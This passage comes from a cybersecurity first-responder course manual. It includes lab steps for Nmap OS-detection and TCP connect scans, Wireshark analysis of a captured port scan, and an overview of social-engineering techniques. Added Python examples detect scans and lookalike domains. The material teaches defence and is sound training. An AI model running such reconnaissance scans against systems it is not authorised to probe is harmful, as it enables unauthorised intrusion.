Instructor note: The command that students should run for step 8b is sudo nmap -O -v 10.39.5.1. Adjust the IP
address, if necessary.


9. You could have run the operating system discovery scan against all the
devices in your network at the same time.
Why would you generally not wish to do that in a production environment?
A: It generates a lot of traffic and could impact network performance.

10. Run a TCP Connect() scan against your server and router using Nmap.

Note: You can scan multiple addresses at once by separating each IP address
with a space.

Instructor note: The command that students should run for step 10 is sudo nmap -sT 10.39.5.1 10.39.5.#,
where # is the last number in their server's IP address. Adjust the IP address, if necessary.

11. Which host showed more port numbers active, and why?
A: The server has more port numbers open because it is a general purpose system rather than a
focused one like a router.

12. What are some of the open ports on your server? Are any of them out of the
ordinary?
A: Answers will vary, but you'll see several ports you should expect to be open, like 53 (DNS) and
389 (LDAP). However, an open port like 22 (SSH) may potentially be used as an attack surface.

13. Close the open terminal and minimize the Kali Linux VM window.



ACTIVITY 3-3
Examining Reconnaissance Incidents

Data Files

C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\Wireshark-win64-2.0.1.exe
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\Reconnaissance.pcapng

Before You Begin

You'll be using Wireshark on your Windows 10 client to analyze previously captured packets.
Wireshark is a sniffer or protocol analyzer that allows for real-time or saved captures of traffic on a
network interface.

Instructor note: Protocol analyzers are discussed in more detail later in the course.

Scenario

One of your new security analysts at Develetech saw a suspicious warning from your IDS that
attacks were targeting your network, so the analyst started the protocol analyzer Wireshark, and
managed to capture one of these attacks in action. You'll determine what type of attack it was and
consider what you can do to prevent such attacks in the future.

Instructor note: Before teaching this activity, consider refreshing students' knowledge of the difference
between destination and source port numbers. Students could also run Wireshark on Kali Linux, though
they'd need to add the .pcapng file to their VM first.

1. Start Wireshark and acquaint yourself with its interface.
a) From the desktop, double-click the Wireshark shortcut.

Note: If you are prompted to update Wireshark, select Skip this version.
b) In The Wireshark Network Analyzer window, select File→Open and navigate to the
Reconnaissance.pcapng file. Double-click the Reconnaissance.pcapng file to open it in Wireshark.




c) If necessary, drag the middle pane down to see a display similar to the one shown here.

d) Observe the three Wireshark panes.
• The top pane contains a list of every packet captured in that session and some summary
information about each one. The packet selected is the one you are looking at in the bottom two
sections. (In this case, packet 1 is selected.)
• The bottom pane displays a hexadecimal readout of the contents of the selected packet with 16
bytes in each line. If you know your Internet headers very well, you can discover the contents of
the traffic from this area alone.
• Fortunately, the middle pane provides a field-by-field interpretation of everything that the bottom
pane displays.
at

e) In the top pane, select packet 1, if necessary.


Note the source and destination IP addresses, the protocol, and the information for this packet.

2. What were the source and destination IP addresses of this packet?


A: Source = 10.39.5.6 and Destination = 10.39.5.2

3. In the middle pane, expand the Transmission Control Protocol section by
selecting the right arrow. Note the source and destination port numbers and
the flags field.




Note: The port numbers and flags are also displayed in the Info column in the top
pane. (The flags are indicated in brackets.)

4. What was the destination port?


A: 443, commonly used by HTTPS.

5. What flags were set for this packet?


A: SYN (synchronize sequence numbers). A synchronization request is the first packet sent in a TCP
session.

6. Analyze the capture file to find the attack(s).
a) From the menu, select Statistics→Conversations.

b) If necessary, select the TCP tab.


c) Select the Packets heading to sort the list by number of packets.


d) Scroll through the list of conversations. Note that there are many one-packet and two-packet
sessions, and a few three-packet sessions.
e) Sort by Port B and note the various destination port numbers.
f) Select the Close button to close the Conversations window.


7. Follow the TCP stream for packet 1.


a) Right-click packet 1 and from the menu, select Follow→TCP Stream to look at just one session.
b) Close the Follow TCP Stream window.
If there were data in the session, you would see it, but there isn't any in this case.

8. Look at the flags of these three packets.


What did the attacker do?
A: The attacker started a session (SYN), received the server response (SYN-ACK), and then reset it
(RST). This is called a stealth scan because it interrupts a connection before it can be completed,
potentially evading automated detection systems.


9. Clear the filter and examine packet 42.


a) At the top-right of the window, select the Clear button.

b) Select packet 42.

10. Follow the stream and close the pop-up window.

What did the attacker do in this case?
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the server.

11. Clear the stream and examine the entire packet capture.

What was the attacker trying to discover from your system in this attack?
A: Which port numbers were open and which were not. In other words, a port scan.

12. How could the attacker proceed after learning this information?
A: The attacker could see what services are running on open ports and try to attack those services.
13. Leave Wireshark open.
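The handshake outcomes described under Network and System Scanning Methods, and the one-, two- and three-packet conversations this activity sorts through by hand in Wireshark, can be classified programmatically. The following is an added example (not part of the courseware): it works on constructed (src, sport, dst, dport, flags) records using the activity's addresses, 10.39.5.6 probing 10.39.5.2, and flags a source that probes several ports on one host.

```python
"""Classify TCP conversations by how the three-way handshake played out.

Added example, not from the CFR courseware. Each packet is a constructed
(src, sport, dst, dport, flags) tuple; addresses follow Activity 3-3, with
10.39.5.6 probing the server 10.39.5.2.
"""
from collections import defaultdict

# Bits of the TCP flags byte.
FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10

# Constructed capture (not a real trace).
PACKETS = [
    # Half-open ("stealth") probe of 443: SYN, SYN-ACK, then RST from the prober.
    ("10.39.5.6", 40001, "10.39.5.2", 443, SYN),
    ("10.39.5.2", 443, "10.39.5.6", 40001, SYN | ACK),
    ("10.39.5.6", 40001, "10.39.5.2", 443, RST),
    # Probe of Telnet (23): the server refuses with RST-ACK.
    ("10.39.5.6", 40002, "10.39.5.2", 23, SYN),
    ("10.39.5.2", 23, "10.39.5.6", 40002, RST | ACK),
    # Probe of 8080: nothing comes back (filtered or dropped).
    ("10.39.5.6", 40003, "10.39.5.2", 8080, SYN),
    # A legitimate client completing the full handshake to LDAP (389).
    ("10.39.5.10", 51000, "10.39.5.2", 389, SYN),
    ("10.39.5.2", 389, "10.39.5.10", 51000, SYN | ACK),
    ("10.39.5.10", 51000, "10.39.5.2", 389, ACK),
]


def conversations(packets):
    """Group packets by their unordered pair of (ip, port) endpoints.

    This mirrors the Statistics > Conversations > TCP view in Wireshark:
    both directions of a session land in one bucket, in capture order.
    """
    convs = defaultdict(list)
    for src, sport, dst, dport, flags in packets:
        a, b = (src, sport), (dst, dport)
        convs[(a, b) if a < b else (b, a)].append((src, sport, flags))
    return convs


def classify(packets):
    """Return {(client_ip, server_ip, server_port): outcome} per conversation.

    Outcomes:
      "open-connect"   SYN, SYN-ACK, ACK: the full handshake (nmap -sT style)
      "open-halfopen"  SYN, SYN-ACK, then RST from the client (stealth scan)
      "closed"         SYN answered by RST from the server
      "no-reply"       SYN with no answer at all (filtered, or host down)
    """
    results = {}
    for key, entries in conversations(packets).items():
        first_src, first_port, first_flags = entries[0]
        if not (first_flags & SYN) or first_flags & ACK:
            continue  # we did not see the start of this session
        client = (first_src, first_port)
        server = key[0] if key[1] == client else key[1]
        # Tag each packet with the side that sent it: "c" client, "s" server.
        seq = [("c" if (s, p) == client else "s", f) for s, p, f in entries]
        reply_at = next((i for i, (side, _) in enumerate(seq) if side == "s"), None)
        if reply_at is None:
            outcome = "no-reply"
        else:
            reply = seq[reply_at][1]
            after = [f for side, f in seq[reply_at + 1:] if side == "c"]
            if reply & RST:
                outcome = "closed"
            elif (reply & SYN) and (reply & ACK) and after and (after[0] & RST):
                outcome = "open-halfopen"
            elif (reply & SYN) and (reply & ACK) and after and (after[0] & ACK):
                outcome = "open-connect"
            else:
                outcome = "incomplete"
        results[(client[0], server[0], server[1])] = outcome
    return results


def scan_report(outcomes, threshold=3):
    """Flag sources that probed at least `threshold` distinct ports on one host.

    Every probe counts, whatever its outcome: a scanner learns as much from
    a RST or from silence as from a SYN-ACK, so detection must not wait for
    completed connections.
    """
    probes = defaultdict(set)
    for client, server, port in outcomes:
        probes[(client, server)].add(port)
    return {pair: sorted(ports) for pair, ports in probes.items()
            if len(ports) >= threshold}


if __name__ == "__main__":
    outcomes = classify(PACKETS)
    for key, outcome in sorted(outcomes.items()):
        print(f"{key[0]} -> {key[1]}:{key[2]:<5} {outcome}")
    print("suspected scans:", scan_report(outcomes))
```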


ACTIVITY 3-4
Capturing and Analyzing Data with Wireshark

Before You Begin

Wireshark is still open in Windows 10.

Scenario

Other than reviewing previously captured data, you need to learn how to capture and analyze traffic
yourself, in case you're the next security team member to see suspicious traffic.

Instructor note: Make sure to give students their classroom IP addresses if you haven't already. This activity
is intended to teach students how to capture and analyze live data in Wireshark. This is an important skill
that they can apply in many places throughout the course.

1. Generate network traffic to be captured in Wireshark.
a) From the menu, select Capture→Options.
b) Select the Ethernet interface and then select the Start button.

c) With the Wireshark capture running, right-click the Windows Start button and select Windows
PowerShell (Admin).
d) If necessary, select Yes in the User Account Control message box.
e) At the command prompt, enter ping 10.39.5.1
f) Enter tracert Microsoft.com

Note: You can choose to let this run until it gets to 30 hops or cancel it after a
few by pressing Ctrl+C.

Instructor note: From here on, the course activity steps assume that the student will accept the User Account
Control and Open File - Security Warning messages.

g) Open your web browser and navigate to windows.microsoft.com.


D

Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments | Topic B


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
102 | CyberSec First Responder® (Exam CFR-410)

h) Switch to your Wireshark capture and select the red Stop capturing packets button or select
Capture→Stop.

Note: You can use the Capture→Options command to specify capturing a
certain amount of data or for a certain time.

2. Use the Wireshark Filter bar to view and analyze only the Internet Control
Message Protocol (ICMP) data.

a) At the top of the Wireshark screen, select the Filter bar.

b) Type icmp and press Enter to create a filter in Wireshark that shows only ICMP data.
Notice that your ping and traceroute traffic shows up here. Remember that you can select any
packet and look at the bottom two panes to see its details.
Note: When you create a new filter, Wireshark highlights the Filter bar with red
if your filter is incomplete or non-functional. The bar turns green when you
have a filter that works; however, it still may not be the filter you meant to use.
A yellow bar indicates that you're using a deprecated filter.

3. Typically, black packets are ICMP errors.
Are the ones in your capture actually an indication of a problem in this case?
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the
routers along the path you specified (in this case, the path to Microsoft's website).

Instructor note: If you wish to give students a hint, remind them these errors were generated by their use of
traceroute.

4. Clear the Filter bar.


a) At the right end of the Filter bar, select the Clear button.

This eliminates your filter and displays the entire capture.


b) On the Filter bar, select the down arrow to display the previous icmp filter.

Note: You can use this technique to rerun a previous filter.



5. Use the Filter bar to show only HTTP data.



a) Select the Filter bar, type http and then press Enter.
This displays the web traffic in the capture, including your access to the Microsoft.com website.

Instructor note: Consider informing students that there is a difference between filtering on port 80, which
displays the entire conversation (including TCP transmissions), and HTTP, which does not.


b) In the upper pane, right-click one of the HTTP packets and select Follow→TCP Stream.

This opens a new window showing the raw data from that session. Red text indicates the client side
of the connection while blue represents the server side.

c) Select Close to return to the main capture.


Notice that your HTTP filter has been replaced by one that identifies the stream you were viewing. If
you select the drop-down arrow, you will see that your HTTP and ICMP filters are still available.

6. Create an ip.addr filter to examine the traffic between client and server.
a) Select Clear to clear the Filter bar.


b) Select the Filter bar, and type ip.

Caution: Do not press Enter yet. Also, make sure you are including the period
at the end.

Notice that the Filter bar is red and that a drop-down list appears with suggestions for additional
parts of the filter. You're looking for addr.

Instructor note: It's important that students do not press Enter until they've finished building the filter in
the following steps.


c) From the drop-down list, select ip.addr.


d) Continue to add to your filter by typing ==10.39.5.1 and press Enter.
Your filter window should now display ip.addr==10.39.5.1.

Note: In Wireshark, == represents equal to, > represents greater than, and <
represents less than. You can also identify entire networks by using Classless
Inter-Domain Routing (CIDR) notation; for example, 10.39.5.0/24 would show
the entire 10.39.5.0 network.
e) Examine the traffic going to and from your router.

Note: You can use ip.src to just look at sources or ip.dst for just destinations.

7. Build a more complex filter using the Expression filter builder.


a) Clear the Filter bar.


b) From the menu, select Analyze→Display Filter Expression.
From here, you can build any filter available in Wireshark, including the ones you just did.
c) Scroll through the Field Name list until you find HTTP and expand the options.


d) From the HTTP options, select http.request.method.


e) In the Relation section, select ==.
f) In the Value field, type GET, noting this field is case sensitive.

g) Select OK.
The filter shows up in the Filter bar but hasn't actually been applied yet.
h) Press Enter to apply the filter.

This capture displays the HTTP GET requests. This is a useful filter to see what pages people are
accessing.

8. Combine the HTTP GET filter and an ICMP filter to view data that matches either filter.

a) In the Filter bar, modify the existing filter to read http.request.method == "GET" || icmp

Note: You can combine filters by using two ampersands && (and) and two pipe
symbols || (or). The bare icmp keyword matches every ICMP message; if you only
want echo requests, use icmp.type==8 instead.

Remind students about the symbols that are used to create and (&&) and or (||) expressions.


b) Press Enter to apply the filter.


Captured traffic from both the ICMP protocol and HTTP GET requests is displayed.

9. Craft a filter to find packets that contain the Transmission Control Protocol (TCP) SYN flag.

After testing it, what filter worked for you?
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. You can also
achieve the same result if you use tcp.flags==0x02 || tcp.flags==0x12 as the filter expression.
Note that both forms match the server's SYN/ACK (0x12) as well as the client's initial SYN
(0x02). To see only packets that open a connection, which is what a SYN scan produces in
volume, use tcp.flags.syn==1 && tcp.flags.ack==0. The tcp.flags==0x02 form is an exact
comparison, so it misses a SYN that also carries the ECN bits (0xC2), whereas tcp.flags.syn==1
tests only the SYN bit and does not.
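The filters built in steps 6 through 9 all test fields of the decoded packet. The following Python script, added here as an illustration and not part of the original activity or of Wireshark itself, decodes a handful of constructed Ethernet/IPv4 frames (the addresses are borrowed from the lab network in this activity; the frames are fabricated) and applies predicates equivalent to ip.addr, tcp.flags.syn==1 and icmp, then counts initial SYNs per source, which is how a SYN scan shows up in a capture. The function and constant names are the example's own.

```python
import ipaddress
import struct
from collections import Counter

SYN, ACK = 0x02, 0x10
ETH = b"\x00" * 12 + b"\x08\x00"  # dst MAC, src MAC, EtherType 0x0800 (IPv4)


def build_ipv4(src, dst, proto, payload):
    """Minimal IPv4 header (no options); checksum left at 0, not validated here."""
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | 5, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, ipaddress.IPv4Address(src).packed,
                      ipaddress.IPv4Address(dst).packed)
    return hdr + payload


def build_tcp(sport, dport, flags):
    """20-byte TCP header: data offset 5, given flags byte, checksum 0."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0)


def build_icmp(icmp_type, code=0):
    return struct.pack("!BBHHH", icmp_type, code, 0, 1, 1)


# Constructed sample capture: one completed handshake and a ping to the router,
# plus two lone SYNs from an outside host to different ports (scan-like).
FRAMES = [
    ETH + build_ipv4("10.39.5.50", "10.39.5.1", 6, build_tcp(51000, 80, SYN)),
    ETH + build_ipv4("10.39.5.1", "10.39.5.50", 6, build_tcp(80, 51000, SYN | ACK)),
    ETH + build_ipv4("10.39.5.50", "10.39.5.1", 6, build_tcp(51000, 80, ACK)),
    ETH + build_ipv4("10.39.5.50", "10.39.5.1", 1, build_icmp(8)),  # echo request
    ETH + build_ipv4("10.39.5.1", "10.39.5.50", 1, build_icmp(0)),  # echo reply
    ETH + build_ipv4("192.168.7.9", "10.39.5.1", 6, build_tcp(40000, 22, SYN)),
    ETH + build_ipv4("192.168.7.9", "10.39.5.1", 6, build_tcp(40001, 445, SYN)),
]


def decode(frame):
    """Return the fields the display filters in the text refer to, or None if not IPv4."""
    if frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    proto = ip[9]
    pkt = {"ip.src": str(ipaddress.IPv4Address(ip[12:16])),
           "ip.dst": str(ipaddress.IPv4Address(ip[16:20])),
           "ip.proto": proto}
    l4 = ip[ihl:]
    if proto == 6:
        sport, dport = struct.unpack("!HH", l4[:4])
        pkt.update({"tcp.srcport": sport, "tcp.dstport": dport, "tcp.flags": l4[13]})
    elif proto == 1:
        pkt["icmp.type"] = l4[0]
    return pkt


def ip_addr(pkt, host_or_cidr):
    """ip.addr==X: true if either endpoint is the host or lies in the CIDR network."""
    net = ipaddress.ip_network(host_or_cidr, strict=False)
    return any(ipaddress.ip_address(pkt[k]) in net for k in ("ip.src", "ip.dst"))


def tcp_syn_set(pkt):
    """tcp.flags.syn==1: matches SYN (0x02) and SYN/ACK (0x12) alike."""
    return pkt.get("ip.proto") == 6 and bool(pkt["tcp.flags"] & SYN)


def tcp_initial_syn(pkt):
    """tcp.flags.syn==1 && tcp.flags.ack==0: only the packet that opens a connection."""
    return tcp_syn_set(pkt) and not pkt["tcp.flags"] & ACK


def is_icmp(pkt):
    return pkt.get("ip.proto") == 1


def apply_filter(frames, predicate):
    return [p for p in map(decode, frames) if p and predicate(p)]


def syn_sources(frames):
    """Initial SYNs per source address; one host hitting many ports suggests a scan."""
    return Counter(p["ip.src"] for p in apply_filter(frames, tcp_initial_syn))


if __name__ == "__main__":
    print(len(apply_filter(FRAMES, lambda p: ip_addr(p, "10.39.5.1"))), "packets to/from the router")
    print(len(apply_filter(FRAMES, lambda p: tcp_syn_set(p) or is_icmp(p))),
          "packets match tcp.flags.syn==1 || icmp")
    print(dict(syn_sources(FRAMES)))
```

The SYN/ACK from the router is the reason tcp_syn_set counts four packets while tcp_initial_syn counts three; the same difference separates tcp.flags.syn==1 from tcp.flags.syn==1 && tcp.flags.ack==0 in Wireshark.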

10. View ICMP warnings logged during the capture.
a) Select Analyze→Expert Information.
b) In the Expert Information dialog box, select the Warn drop-down arrow for ICMP to expand its
messages.

11. Why do some ICMP requests have no answer?

A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so
they had no answering packet.

12.What are the strengths of Wireshark as an analysis tool?


A: Answers will vary, but may include that it sees every packet the interface sees, it has some
advanced analysis capability, and the filters enable you to break down the capture by almost any
metric.


13. What are some weaknesses of Wireshark for packet analysis?

A: Answers will vary, but may include that it only sees what the interface it's connected to sees
(which has limited use in a switched network unless you mirror a switch port or insert a network
tap); captures are automated with the command-line tools that ship with it, such as tshark and
dumpcap, rather than through the GUI; and the program has very little intelligence for detecting
suspicious behavior, unlike intrusion detection systems/intrusion prevention systems (IDSs/IPSs).

14.Can Wireshark tell you if certain traffic indicates an attack?


A: No—you must be able to analyze the capture and make that determination.

15. Close Wireshark without saving. Also close any open browser windows and PowerShell windows.


TOPIC C
Assess the Impact of Social Engineering
A large part of an attacker's reconnaissance efforts will be to deceive and manipulate their targets.
After all, finding a vector for a technical attack can be a difficult prospect. Instead of going through
that trouble, the attacker can simply exploit the weakest link in any organization: the people.

Social Engineering
Social engineering is the practice of deceiving people into giving away access or confidential
information to unauthorized parties. The social engineer typically performs some sort of confidence
trick on a privileged target. The target, unaware of this trick, uses their privileges to grant the
attacker access or information. This may be the attacker's ultimate goal, but social engineering is
often used as a springboard to a larger, more devastating attack. This is especially true when social
engineering is used in reconnaissance: the attacker deceives employees into revealing information
about the company's personnel, its policies, and its operations, which the attacker can use to their
advantage when they plan their attack.

When an attacker engages in social engineering, they can even avoid standard cybersecurity defenses
entirely, focusing their attack on undermining human weaknesses rather than crafting highly
technical exploits.

Social engineering is one of the most common and successful malicious techniques in information
security. Because it exploits basic human trust, social engineering has proven to be a particularly
effective way of manipulating people into misplacing that trust. A social engineer may pose as an
authority figure, like a manager or IT administrator, or someone the user is familiar with, like a
friend or family member. If the façade is believable enough, the victim will likely let their guard
down. In many cases, this is enough for the attacker to capitalize on, potentially leading to serious
consequences for the organization.
Figure 3-8: A social engineering attack.

Consider asking students if they can provide real-world examples of these types of attacks. Do they
have experience in being targeted for a social engineering attempt? Do they know anyone who has
been a victim of such an attack?

Types of Social Engineering
Social engineering can take several different forms. One type of attack may be more effective against
particular targets, or it may simply get the attacker more of what they're looking for. Some attack
types are simply easier than others to pull off. No matter the reason, each one of the following social
engineering attack types can be troublesome for the organization if taken for granted.

Social Engineering Type: Description

Impersonation
This is a human-based attack where an attacker pretends to be someone they are not. A common
scenario is when the attacker calls an employee and pretends to be calling from the help desk. The
attacker tells the employee they are reprogramming the order-entry database, and they need the
employee's user name and password to make sure it gets entered into the new system.
Impersonation is often successful in situations where an identity cannot be easily established. If the
employee in the previous example doesn't know the real help desk worker or the help desk number,
they may be less inclined to question the request. Additionally, impersonation may be fairly
successful in face-to-face interactions. Due to various social factors, most people want to avoid
appearing rude or dismissive when they're talking with another human being directly. So, they may
not question the impostor like they would if it were email correspondence. This requires that the
victim doesn't actually know what the individual being impersonated looks like, or doesn't know
them well enough to doubt their appearance.

Hoax
This is an email-based or web-based attack that is intended to trick the user into performing
undesired actions, such as deleting important system files in an attempt to remove a virus. It could
also be a scam to convince users to give up important information or money for an interesting offer.
Like many social engineering techniques, hoaxes depend greatly on the amount of experience the
target has with computer technology. An email that tells a user to delete a virus file on their
computer will likely be ineffective if the user knows what the file does, or if they know that antivirus
software is the preferred method for detecting and removing infected files.

Quid pro quo
Quid pro quo is Latin and can be translated as "something for something" or "this for that."
Essentially, one party does a favor for another party, but expects a favor in return. In the realm of
social engineering, quid pro quo threats often take the form of the attacker asking a victim for access
credentials or sensitive information, and promising to provide that victim with a "gift" or a favor.
For example, an attacker might ask an employee to fill out a survey about their workplace
responsibilities. The information the employee provides on the form may go into too much detail
and give the attacker some reconnaissance material. At the end of the form, the attacker claims they
will send the employee a prize for being so helpful. The actual gift or favor is not necessarily
delivered. However, if the attacker can guarantee delivery, the victim will be more likely to trust the
attacker and give the information they seek.

Phishing and SMiShing
These are common types of message-based social engineering attacks. In a phishing attack, the
attacker sends an email that seems to come from a respected source, such as a bank or financial
institution. The email claims the recipient needs to provide an account number, Social Security
number, or other private information to the sender to "verify an account." Ironically, the phishing
attack often claims the "account verification" is necessary for security reasons. Legitimate financial
institutions never solicit this information from their clients by email.
When the medium used is SMS text messages rather than email, this is called SMiShing.
Phishing is one of the most prominent forms of social engineering, and even experienced computer
users may be fooled by what appears to be an authority figure.

Spear phishing and whaling
When a phishing attack targets a specific individual or institution, it is called spear phishing.
Whaling is a form of spear phishing that targets high-value individuals, typically senior executives
or others with authority over money and data, such as officers of Fortune 500 companies or
financial institutions. Whaling is a riskier method for social engineers, as security is bound to be
more robust than it is with average users or small companies, and the consequences of being caught
will likely be much more severe. However, exploiting the weakest link can result in a huge payoff for
the attacker(s).

Vishing
This is a human-based attack where the goal is to extract personal, financial, or confidential
information from the victim by using services such as a telephone system and IP-based voice
messaging services (Voice over Internet Protocol or VoIP) as the communication medium. This is
also called voice phishing.
Vishing can be more effective than phishing because of the trust people tend to place in others they
can speak to in real time. In addition, users may be too used to traditional telecommunications to
know that a VoIP identity, including the caller ID that is displayed, can be much more easily spoofed
due to the open nature of the Internet.

Pharming
This is an attack similar to phishing that is performed by redirecting a request for a website, typically
an e-commerce or banking site, to a similar-looking but fake website. Unlike a phishing link, the
redirection happens beneath the browser, typically through poisoned DNS records or a modified
hosts file, so the user can type the correct address and still land on the attacker's site. The attacker
can trick the user into entering their credentials or downloading a malicious file since the user trusts
what appears to be a legitimate website.

Baiting
Baiting exploits the human tendency toward curiosity by planting physical media in an area where
someone will find it and then promptly use it. For example, a social engineer might install malware
on a removable Universal Serial Bus (USB) drive, then place that drive on the ground in a parking lot
outside a corporate office. An employee who arrives for work may notice that drive, pick it up, then
promptly insert it into their workstation. If their workstation has autorun enabled for removable
media, the malware will immediately infect the host and may spread to other hosts in the corporate
network.
A similar virtual attack occurs when a user is enticed to download free software, which an attacker
has packaged with a Trojan horse.

URL hijacking
Also called typosquatting, this is the tactic of exploiting typos that users sometimes make when
entering a URL into a browser. For example, a malicious user might register a domain with the URL
www.mircosoft.com, which has a minor typo compared to the correct www.microsoft.com. A user
who makes this mistake when entering the URL into their browser will be directed to the attacker's
site, which may mimic the real website or contain malicious software that will infect the victim's
computer.

Spam and spim
Spam is an email-based threat where the user's inbox is flooded with emails that advertise products
or promotions for get-rich-quick schemes and can sometimes deliver malware. Spam can also be
used within social networking sites such as Facebook and Twitter. Spim is an attack similar to spam
that is propagated through instant messaging (IM) instead of through email.
With the prevalence of spam filters in email clients and spim blockers in instant messaging services,
these techniques are less effective than they used to be. However, the sheer volume of unsolicited
messages sent in bulk every day still makes spam and spim viable methods for deceiving
inexperienced users.

Shoulder surfing
This is an attack where the goal is to look over the shoulder of an individual as they enter password
information or a PIN. This is very easy to do today with smartphones. The attacker doesn't even
need to be present; they can set their phone down near the victim's desk, press record, and walk
away. Attackers can also shoulder surf at a distance using surveillance cameras or binoculars.
Shoulder surfing is a common tactic among insider threats as they already have physical access to
their colleagues' workspaces.

Dumpster diving
This is an attack where the goal is to reclaim important information by inspecting the contents of
trash containers. This is especially effective in the first few weeks of the year as users discard old
calendars with passwords written in them. In addition, an attacker can glean sensitive financial or
operational information from a company that improperly disposes of hard-copy documents. A
typical defense against dumpster diving is to shred such documents, but with enough time and
effort, an attacker may be able to recover a shredded document. This is why some organizations opt
(or are required) to incinerate their confidential documents.

Tailgating
This is a human-based attack where the attacker slips into a secure area by following a legitimate
employee through the door. The employee does not know the attacker is even behind them. To
prevent this type of attack, organizations often install access control mechanisms at each entrance.
Users should also be educated to be more observant of their surroundings when they enter
buildings.

Piggybacking
This is similar to tailgating, but the primary difference is the employee actually knows someone is
following behind them. The employee may or may not personally know the attacker. If they do, they
could be complicit in the attack, or they could simply be ignorant of the attacker's intentions and
lack of authorization. For example, the employee may be an acquaintance of the attacker, but doesn't
know the attacker was just terminated from the company. So, they let the attacker in thinking that it's
just another day.
More likely, however, is the employee doesn't know the attacker personally. Many people would
prefer to avoid confrontation even if they suspect the piggybacker isn't authorized to enter. Some
people may not even consider that the piggybacker doesn't belong, and will open the way for them
just to be polite.
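URL hijacking and pharming both rely on a host name that resembles a trusted one. The following Python script is an added example, not part of the course material, that applies the checks a mail gateway or web proxy might use to flag such hosts: an IP-literal host, a trusted brand used as a subdomain of some other registrable domain, a brand embedded in a longer label, digit-for-letter confusables, and names within one edit (including the transposition in mircosoft) of a protected domain. The PROTECTED list, the confusable table and the test URLs are assumptions for the example; a production tool would use the Public Suffix List instead of the two-label approximation used here.

```python
import ipaddress
from urllib.parse import urlsplit

# Domains this organization wants to protect: an assumption for the example.
PROTECTED = ["microsoft.com", "google.com", "develetech.com"]

# Substitutions attackers use to imitate letters (constructed list, not exhaustive).
CONFUSABLES = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s"}


def registrable(host):
    """Approximate the registrable domain with the last two labels
    (www.mircosoft.com -> mircosoft.com). A real tool would consult the
    Public Suffix List so that suffixes such as co.uk are handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize(label):
    """Undo the common look-alike substitutions before comparing to a brand."""
    for fake, real in CONFUSABLES.items():
        label = label.replace(fake, real)
    return label


def edit_distance(a, b):
    """Damerau-Levenshtein (optimal string alignment): insert, delete,
    substitute, or swap two adjacent characters, each costing 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def classify_url(url):
    """Return (verdict, reason) for the host part of a URL or bare host name."""
    host = urlsplit(url if "://" in url else "http://" + url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return "suspicious", "IP-literal host, no domain name to judge"
    except ValueError:
        pass
    reg = registrable(host)
    if reg in PROTECTED:
        return "ok", f"{reg} is a protected domain"
    labels = host.lower().split(".")
    cand = reg.split(".")[0]
    for legit in PROTECTED:
        brand = legit.split(".")[0]
        if normalize(cand) == brand:
            return "suspicious", f"confusable spelling of {legit}"
        if edit_distance(cand, brand) <= 1:
            return "suspicious", f"one edit away from {legit}"
        if brand in labels:
            return "suspicious", f"{brand} used as a subdomain of {reg}"
        if brand in cand:
            return "suspicious", f"{brand} embedded in {reg}"
    return "unknown", "no resemblance to a protected domain"


if __name__ == "__main__":
    # Constructed inputs, including the typo from the text.
    for u in ["www.mircosoft.com", "https://www.microsoft.com/", "www.micros0ft.com",
              "http://10.39.5.10/index.html", "https://mail.google.com.verify-login.example/",
              "https://accounts-google.example/signin", "https://example.org/"]:
        print(f"{u:48} {classify_url(u)}")
```

The edit-distance threshold of 1 is deliberately tight; raising it catches more squats but starts flagging unrelated short names, so a real deployment tunes it per brand and combines it with lists of newly registered domains.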

Phishing and Delivery Media
Because phishing is perhaps the most popular and effective social engineering type, it's a good idea
to take a closer look at these attacks.
As you've seen, different variations on phishing, like vishing and SMiShing, imply the use of more
than just email as a delivery medium. In fact, there are many such delivery media that phishing
attacks can use:
• Email is the standard medium used to entice targets into revealing information. The advantage
of using email is its asynchronous nature: neither the attacker nor the target expects any real-time
communication, so the attacker doesn't need to submit to on-the-spot questioning from
someone who is skeptical. The attacker can more easily filter out savvy users this way and focus
instead on snaring the inexperienced or gullible. However, the disadvantage of email is that
phishing attempts are often caught by modern spam filters, so the user may never even see the
attempt.
• Electronic postcards, or e-cards, are typically media like video or animations embedded into
email messages. Visually appealing messages can be more successful at enticing users to click
them. This is especially true if the attacker puts thought into who they're targeting and what kind
of greeting might be appropriate. For example, if the attacker discovers their target's date of
birth, they can increase their chances of infiltration by crafting a malicious birthday e-card and
sending it to the target on their birthday. The disadvantage of using e-cards is that many email
clients will default to blocking visual elements from unknown sources.
• Instant messaging is more of a real-time communication method than email, and may be less
effective because people tend to be more cautious when someone they don't know is messaging
them. However, the quick and expedient nature of instant messaging may actually have the
opposite effect: people may take less time to think about the message they're reading, who sent
it, and what the hyperlink will do when they select it. Another potential issue with IM-based
phishing is that spam filters in IM software are not as robust as with email.
• Text messaging has many of the same issues as instant messaging. Most modern phones have
SMS capabilities, and most mobile phone users engage in texting. So, if they see a text message
from a number instead of a person from their contacts list, the user may be more likely to
disregard the message. However, attackers can reach a much wider audience with SMS than with
